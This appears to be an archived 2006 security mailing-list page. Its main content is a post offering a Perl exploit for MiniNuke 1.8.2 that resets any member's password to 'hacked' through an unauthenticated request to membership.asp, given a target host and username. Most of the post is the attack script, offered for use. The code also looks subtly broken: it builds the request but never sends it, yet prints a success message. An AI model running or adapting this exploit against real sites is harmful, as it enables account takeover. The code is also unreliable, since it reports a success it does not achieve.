Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[xpl#2] MiniNuke 1.8.2 - change member's passwrod < Perl >

from [hessam] Network Security [Permanent Link]
Subject: [xpl#2] MiniNuke 1.8.2 - change member's passwrod < Perl >
Date: 29 Jan 2006 18:17:22 -0000 
I create exploit for a bug at Mininuke ; this bug at "membership.asp"
and you can with this exploit change members password :)
if you inject:
" /membership.asp&pass=[New password]&passa=[confirm new password]&x=[member 
name] "
This bug found by nukedx & exploit by Hessam-x

---------
+ APP name  : Mininuke
+ Version   : 1.8.2
+ exploit by: Hessam-x
+ Type      : High
+ Des       : with this exploit you can change user's password
+ IHST - Iran Hackerz Security Team (Hackerz.ir)
+ KuT  - Kachal667 under9round team (Kachal667.com)

 Exploit type : Perl
[-- PERL C0DE --]


#!/usr/bin/perl
#--------------------------------------------------------#
#-      => Mininuke  1.8.2
#-      Founder nukedx & Exploit by Hessam-x
#-      www.Hackerz.ir Iran Hackers Security Team
#-      Hessam-x  <> irc0d3r|at|Yahoo.com
#-      Spescial Thanx : all iranian Hackers & Str0ke
#-      IR4N H4CK3RZ S3CURITY T34M
#--------------------------------------------------------#
# This bug at Membership.asp
use IO::Socket;

if (@ARGV < 1)
{
print "\n============================================\n";
print "\n         IRAN HACKERZ SECURITY TEAM         \n";
print "\n============================================\n";
print "\n                                              ";
print "\n   MININUKE 1.8.2                             ";
print "\n   Exploit by Hessam-x & Found by nukedx      ";
print "\n   www.Hackerz.ir Iran Hackers Security Team  ";
print "\n                                              ";
print "\n============================================\n";
print "Usage : minimuke.pl [HOST] [Member name]\n\n";

  print "Examples:\n\n";
 print "   mininuke.pl www.Site.com admin \n";
 exit();
}

my $host = $ARGV[0];
my $usero= $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "Cannot connect to $host" }

print "[+]connected\n";

$addr = "GET /membership.asp?pass=hacked&passa=hacked&x=$usero&B1=Send 
HTTP/1.0\n";
$addr .= "Host: $host\n\n\n\n";
print "\n";
print "[+]Wait...";
sleep(5);
print "Wait For Changing Password ...\n";
print "[+] :D OK \n";
print "Username: $usero\n";
print "Password: hacked\n\n";

[/-- PERL CODE --]

# Hessam-x (Hessam M.Salehi)- www.hessam.org
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [xpl#2] MiniNuke 1.8.2 - change member's passwrod < Perl >, hessam <=
Previous by Date:  TSLSA-2006-0004 - multi, Trustix Security Advisor
Next by Date:  Arescom NetDSL-1000 DoS atack source, framirez
Previous by Thread:  TSLSA-2006-0004 - multi, Trustix Security Advisor
Next by Thread:  Arescom NetDSL-1000 DoS atack source, framirez
Indexes:  [Date] [Thread] [Top] [All Lists]